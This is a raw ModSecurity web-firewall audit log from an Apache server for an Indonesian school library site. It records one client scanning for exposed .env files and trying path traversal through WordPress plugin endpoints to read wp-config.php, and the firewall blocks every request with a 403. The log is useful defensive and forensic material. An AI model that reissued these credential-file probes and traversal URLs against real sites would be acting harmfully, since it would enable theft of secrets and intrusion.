Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f27bf25-Z-- --2697ce6d-A-- [25/Apr/2025:17:49:56 +0700] aAto1OXF4ZX3hX-IbN7h_gAAAJA 103.236.140.4 42548 103.236.140.4 8181 --2697ce6d-B-- GET /api_v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268864 --2697ce6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2697ce6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578196941636 702 (- - -) Stopwatch2: 1745578196941636 702; combined=278, p1=243, p2=0, p3=0, p4=0, p5=34, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2697ce6d-Z-- --e4466743-A-- [25/Apr/2025:17:49:57 +0700] aAto1eXF4ZX3hX-IbN7h_wAAAIw 103.236.140.4 42552 103.236.140.4 8181 --e4466743-B-- GET /api_v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362332 --e4466743-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e4466743-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578197138764 736 (- - -) Stopwatch2: 1745578197138764 736; combined=306, p1=280, p2=0, p3=0, p4=0, p5=26, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4466743-Z-- --49da7221-A-- [25/Apr/2025:17:49:57 +0700] aAto1eXF4ZX3hX-IbN7iAQAAAI4 103.236.140.4 42560 103.236.140.4 8181 --49da7221-B-- GET /v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268870 --49da7221-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --49da7221-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578197537841 664 (- - -) Stopwatch2: 1745578197537841 664; combined=314, p1=270, p2=0, p3=0, p4=0, p5=44, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49da7221-Z-- --896c9061-A-- [25/Apr/2025:17:49:57 +0700] aAto1eXF4ZX3hX-IbN7iAwAAAJg 103.236.140.4 42566 103.236.140.4 8181 --896c9061-B-- GET /v1/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268873 --896c9061-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --896c9061-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578197935866 659 (- - -) Stopwatch2: 1745578197935866 659; combined=323, p1=275, p2=0, p3=0, p4=0, p5=48, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --896c9061-Z-- --d1342f48-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBAAAAIo 103.236.140.4 42572 103.236.140.4 8181 --d1342f48-B-- GET /admin/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362341 --d1342f48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d1342f48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198133453 665 (- - -) Stopwatch2: 1745578198133453 665; combined=255, p1=225, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1342f48-Z-- --9ab04d5a-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBQAAAIY 103.236.140.4 42580 103.236.140.4 8181 --9ab04d5a-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362344 --9ab04d5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9ab04d5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198330921 683 (- - -) Stopwatch2: 1745578198330921 683; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ab04d5a-Z-- --df85b562-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBgAAAIs 103.236.140.4 42584 103.236.140.4 8181 --df85b562-B-- GET /ci4/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268879 --df85b562-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --df85b562-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198528235 846 (- - -) Stopwatch2: 1745578198528235 846; combined=333, p1=293, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df85b562-Z-- --db916752-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBwAAAII 103.236.140.4 42588 103.236.140.4 8181 --db916752-B-- GET /backup/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362347 --db916752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --db916752-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198725951 669 (- - -) Stopwatch2: 1745578198725951 669; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db916752-Z-- --b1330c72-A-- [25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iCAAAAIc 103.236.140.4 42592 103.236.140.4 8181 --b1330c72-B-- GET /frontend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268882 --b1330c72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b1330c72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578198922904 687 (- - -) Stopwatch2: 1745578198922904 687; combined=256, p1=224, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1330c72-Z-- --dbf1d15c-A-- [25/Apr/2025:17:49:59 +0700] aAto1-XF4ZX3hX-IbN7iCQAAAIU 103.236.140.4 42596 103.236.140.4 8181 --dbf1d15c-B-- GET /old/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362350 --dbf1d15c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dbf1d15c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578199120372 896 (- - -) Stopwatch2: 1745578199120372 896; combined=342, p1=297, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbf1d15c-Z-- --13748561-A-- [25/Apr/2025:17:49:59 +0700] aAto1-XF4ZX3hX-IbN7iCgAAAIk 103.236.140.4 42600 103.236.140.4 8181 --13748561-B-- GET /dev/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268885 --13748561-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13748561-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578199319234 775 (- - -) Stopwatch2: 1745578199319234 775; combined=304, p1=272, p2=0, p3=0, p4=0, p5=32, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13748561-Z-- --232d3b70-A-- [25/Apr/2025:17:49:59 +0700] aAto1-XF4ZX3hX-IbN7iCwAAAJU 103.236.140.4 42608 103.236.140.4 8181 --232d3b70-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268888 --232d3b70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --232d3b70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578199517057 693 (- - -) Stopwatch2: 1745578199517057 693; combined=280, p1=245, p2=0, p3=0, p4=0, p5=34, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --232d3b70-Z-- --3e605c37-A-- [25/Apr/2025:17:49:59 +0700] aAto1-OdEP6frSVs8Cp41gAAABM 103.236.140.4 42612 103.236.140.4 8181 --3e605c37-B-- GET /public/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362356 --3e605c37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3e605c37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578199715199 1141 (- - -) Stopwatch2: 1745578199715199 1141; combined=391, p1=342, p2=0, p3=0, p4=0, p5=49, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e605c37-Z-- --9cef0c06-A-- [25/Apr/2025:17:50:05 +0700] aAto3eOdEP6frSVs8Cp42gAAAAI 103.236.140.4 42686 103.236.140.4 8181 --9cef0c06-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362407 --9cef0c06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9cef0c06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578205547721 838 (- - -) Stopwatch2: 1745578205547721 838; combined=379, p1=346, p2=0, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cef0c06-Z-- --48f01416-A-- [25/Apr/2025:17:50:05 +0700] aAto3fKu9d5eAb6Kn98pIgAAANQ 103.236.140.4 42696 103.236.140.4 8181 --48f01416-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137268942 --48f01416-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48f01416-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578205746005 806 (- - -) Stopwatch2: 1745578205746005 806; combined=336, p1=301, p2=0, p3=0, p4=0, p5=34, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f01416-Z-- --a6604636-A-- [25/Apr/2025:17:50:05 +0700] aAto3fKu9d5eAb6Kn98pIwAAANE 103.236.140.4 42700 103.236.140.4 8181 --a6604636-B-- GET /force-download.php?file=wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362410 --a6604636-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a6604636-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745578205945914 943 (- - -) Stopwatch2: 1745578205945914 943; combined=374, p1=337, p2=0, p3=0, p4=0, p5=37, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6604636-Z-- --3eaab400-A-- [25/Apr/2025:17:50:06 +0700] aAto3j8HMZgF-3Y3GtGAdAAAAE8 103.236.140.4 42708 103.236.140.4 8181 --3eaab400-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362413 